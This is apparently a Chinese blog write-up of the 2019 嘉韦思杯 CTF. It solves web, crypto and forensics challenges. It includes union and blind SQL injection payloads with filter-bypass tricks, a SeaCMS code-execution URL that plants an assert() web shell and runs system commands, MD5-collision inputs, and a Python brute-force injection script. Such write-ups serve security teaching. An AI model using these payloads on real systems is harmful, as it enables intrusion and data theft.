嘉韦思杯writeup

发表于 | 分类于
2019 嘉韦思杯ctf 比赛,但还有4题(两道逆向,两道解密)没有做出

嘉韦思杯 [http://ctf.ecnu.edu.cn/]

土肥原贤二

简单的sql注入

库:-1’ union select database(),2,3,4

得库名 luozhen

表: -1’ union select database(),(select group_concat(table_name) from information_schema.tables where table_schema=database()),3,4#

得表名 luozhen,flag,goods3

列: -1’ union select 1,(select group_concat(column_name) from information_schema.columns where table_name=’flag’),3,4#

列名 id,flag

内容: -1’ union select 1,(select group_concat(flag) from luozhen.flag limit 0,1),3,4#

最终可得:flag{20_welcome_19}

吴佩孚

47.103.43.235:85/b/第一题_js?.txt

将文本进行base64解密,然后将得到的字符放到控制台跑一下

嘉韦思杯1

最终可得:flag{sdf465454dfgert32}

死亡真相

使用工具Audacity打开文件,查看频谱图,
得到

嘉韦思杯5

flag:85a9d4517d4725_b9_8cbc9fd_554216
好吧,是个假flag

同时可以发现,文件中多次出现zero,将_变为0,再用md5解密

最终可得:flag{hsd132456}

日军空袭

将文本一直进行base64解密,最终可得fB__l621a4h4g_ai{&i}

嘉韦思杯4

可发现规律: 每间隔4个字符, 可发现规律: 每间隔4个字符, flag{B64_&_2hai_14i}

戴星炳

python脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#-*- encoding: utf-8 -*-
import requests
import re

r = requests.session()

body = r.get("http://47.103.43.235:82/web/a/index.php")

print(body.text)

jisuan = re.findall("?</p><p>(.*?)</p>",body.text)

print(jisuan[0])

flag = eval(jisuan[0])

print(flag)
data1 = {
        'result': flag
}

flag = r.post("http://47.103.43.235:82/web/a/index.php",data=data1)

print(flag.text)

最终可得:flag{Y0U_4R3_3o_F4ST!}

大美晚报

扫描二维码并没有什么用。。。

使用记事本打开,有 key.txt | 管理员使用了他的QQ号进行加密 的提示

使用kali

使用binwalk工具进行分析提取

大美日报

有一个zip压缩包

使用 foremake 工具提取

大美日报2

最终可得: flag{Y0U_4R3_3o_F4ST!}

袁殊

RSA256.tar.gz,下载解压后得到两个文件夹:fllllllag.txt | gy.key

使用kali虚拟机中的openssl工具

输入命令 openssl rsa -pubin -text -modulus -in warmup -in RSA256/RSA256/gy.key

得到:

1
2
3
4
5
6
7
8
9
10
11
12
Public-Key: (256 bit)
Modulus:
    00:a9:bd:4c:7a:77:63:37:0a:04:2f:e6:be:c7:dd:
    c8:41:60:2d:b9:42:c7:a3:62:d1:b5:d3:72:a4:d0:
    89:12:d9
Exponent: 65537 (0x10001)
Modulus=A9BD4C7A7763370A042FE6BEC7DDC841602DB942C7A362D1B5D372A4D08912D9
writing RSA key
-----BEGIN PUBLIC KEY-----
MDwwDQYJKoZIhvcNAQEBBQADKwAwKAIhAKm9THp3YzcKBC/mvsfdyEFgLblCx6Ni
0bXTcqTQiRLZAgMBAAE=
-----END PUBLIC KEY-----

Modulus=A9BD4C7A7763370A042FE6BEC7DDC841602DB942C7A362D1B5D372A4D08912D9 转换成十进制为Modulus=76775333340223961139427050707840417811156978085146970312315886671546666259161

再将Modulus分成:

1
2
a=273821108020968288372911424519201044333
b=280385007186315115828483000867559983517

![嘉韦思杯2嘉韦思杯2.png)

编写脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#-*- encoding: utf-8 -*- 

import gmpy 

import rsa 

Modulus = 76775333340223961139427050707840417811156978085146970312315886671546666259161 
a = 273821108020968288372911424519201044333 
b = 280385007186315115828483000867559983517 

Exponent = 65537 

d = int(gmpy.invert(Exponent , (a-1) * (b-1))) 

privatekey = rsa.PrivateKey(Modulus , Exponent , d , a , b)      #计算私钥 

with open("./fllllllag.txt" , "rb") as f: 

    print(rsa.decrypt(f.read(), privatekey).decode())       #使用私钥对密文进行解密

最终可得:flag{_2o!9_CTF_ECUN_}

作战计划

这道题是要找cms的漏洞,seacms有前台任意代码执行漏洞

http://47.103.43.235:84/search.php?searchtype=5&tid=6&year=2014);phpinfo();//

嘉韦思杯6.1

继续输入
http://47.103.43.235:84/search.php?searchtype=5&tid=6&year=2019);assert($_POST["raidsh"]);//

同时post参数:radish=system("cat $(find / -name flag*)")

最终可得:flag{!!seacms_@@}

晴气庆胤

源码里有提示提示

1
if ((string)$_POST['paraml']!==(string)$_POST['param2']&&md5($_POST['paraml'])===md5($_POST['param2']))

抓包修改post

1
2
param1=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&
param2=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

得flag : flag{MD5@_@success}

池步洲

简单的数组绕过

通过查看源码发现index.phps,下载查看代码:

1
2
3
4
5
6
7
8
9
10
11
<?php
error_reporting(0);
$flag = '********';
if (isset($_POST['name']) and isset($_POST['password'])){
	if ($_POST['name'] == $_POST['password'])
		print 'name and password must be diffirent';
	else if (sha1($_POST['name']) === sha1($_POST['password']))
		die($flag);
	else print 'invalid password';
}
?>

分析代码

池步洲

最终可得: flag{Y0u_just_br0ke_sha1}

冈村宁次

打开题目发现是这样的:

嘉韦思杯3

以为只是简单的注入,然后尝试了几下,原来并没有想象的简单

后来发现MQ==base64解码后等于1

尝试传递参数:if(1,1,2),base64编码后逆序得到pIDLxwSMoYWa
if(0,1,2),base64编码后逆序得到pIDLxwCMoYWa

嘉韦思杯7

嘉韦思杯8

过滤了 空格,等号,可用/*1 */like绕过

python脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
import base64
import requests
import sys

reload(sys)
sys.setdefaultencoding("utf8")

def string_reverse(m):
    s = base64.b64encode(m)
    num=len(s)
    a=""
    for i in range(num):
        a += s[num-1-i]
    return a

url ="http://47.103.43.235:83/web/a/index.php?id="
flag =""
for i in range(1,40):
	for j in range(33,128):
		# playload = "if((ascii(substr(database(),"+str(i)+",1))>"+str(j)+"),1,2)"
		# playload = "if((ascii(substr((selselectect/*a*/group_concat(table_name)/*a*/from/*a*/infoorrmation_schema.tables/*a*/ where/*a*/table_schema/*a*/like/*a*/ database()),"+str(i)+",1))>"+str(j)+"),1,2)"  
		# playload = "if((ascii(substr((selselectect/*a*/ group_concat(column_name)/*a*/ from /*a*/infoorrmation_schema.columns/*a*/ where/*a*/ table_name/*a*/like/*a*/'flag'),"+str(i)+",1))>"+str(j)+"),1,2)" 
		playload = "if((ascii(substr((seleselectct/*a*/flag /*a*/from/*a*/ flag),"+str(i)+",1))>"+str(j)+"),1,2)"
		# print playload
		# exit()
		playload = string_reverse(playload)
		# print playload
		r=requests.get(url+playload)
		# print url+playload
		# print r.text
		# exit()
		if "2019-11-11" in r.text:
			flag += str(chr(j))
			print flag
			break

嘉韦思杯9

最终可得:flag{s9li_1s_s0_e4sY}